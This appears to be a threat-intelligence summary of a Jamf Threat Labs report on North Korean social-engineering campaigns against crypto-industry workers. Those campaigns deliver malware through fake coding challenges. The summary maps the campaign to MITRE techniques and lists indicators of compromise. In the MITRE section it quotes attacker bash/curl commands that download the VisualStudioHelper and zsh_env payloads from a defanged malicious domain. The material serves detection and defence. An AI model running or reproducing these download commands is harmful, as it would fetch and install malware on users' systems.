Jamf Threat Labs reports targeted attacks in the crypto sector where North Korea uses social engineering on professional networks to deliver malware disguised as coding challenges. The campaign features two main payloads, VisualStudioHelper and zsh_env, linked to Thiefbucket (Rustdoor) with infostealer and backdoor capabilities, and persistence via cron or zshrc; training employees to ignore unsolicited software requests is advised. #DPRK #NorthKorea #Thiefbucket #Rustdoor #VisualStudioHelper #zsh_env #LinkedIn #StonFi #taurihostmetrics #wiresapplication
Keypoints
- The FBI warned that North Korea is targeting individuals in the crypto industry with social engineering.
- Attacks typically begin with outreach on professional networking sites like LinkedIn.
- Malware is delivered through fake job offers and coding challenges.
- Two main payloads are identified: VisualStudioHelper and zsh_env, with similar functions but different persistence methods.
- Thiefbucket (Rustdoor) is associated with these attacks and has infostealer capabilities.
- Organizations should train employees to be cautious of unsolicited requests to run software.
MITRE Techniques
- [T1566] Social Engineering – Initial Access – Impersonation and social media reconnaissance to target victims. – “Before initiating contact, the actors scout prospective victims by reviewing social media activity, particularly on professional networking or employment-related platforms.”
- [T1059] Command and Scripting Interpreter – Execution – Use of bash to download and run payloads from coding challenges. – “bash -c ‘cd /Users/$USER/Library/ …; curl -O -s https://taurihostmetrics[.]com/cloud/VisualStudioHelper …’ “
- [T1105] Ingress Tool Transfer – Downloading second-stage payloads from remote hosts. – “curl -O -s https://taurihostmetrics[.]com/cloud/VisualStudioHelper” and “curl -O -s https://taurihostmetrics[.]com/cloud/zsh_env”
- [T1053] Cron – Persistence – VisualStudioHelper persists via cron. – “The VisualStudioHelper will persist via cron …”
- [T1204] User Execution – Credential Access – Prompting users for passwords via deceptive dialog boxes. – “dialog window tailored to look as though it originated from Visual Studio” and password prompt context
- [T1071] Command and Control – C2 – Malware communicates with command and control servers. – “communicates with command and control servers.”
Indicators of Compromise
- [Domain] tauri hosts and C2 domains – taurihostmetrics[.]com, wiresapplication[.]com, juchesoviet48[.]com
- [IP Address] Public endpoints used by criminals – 139.59.182[.]234, 62.204.41[.]73, 185.234.216[.]180
- [File Hash] Stage payloads and artifacts – 51a88646f9770e09b3505bd5cbadc587abb952ba, f669fba857401406db6b35958d5f57d9d8030f56
- [File] VisualStudioHelper, zsh_env, Project.zip (Coding Challenge)
Read more: https://www.jamf.com/blog/jamf-threat-labs-observes-targeted-attacks-amid-fbi-warnings/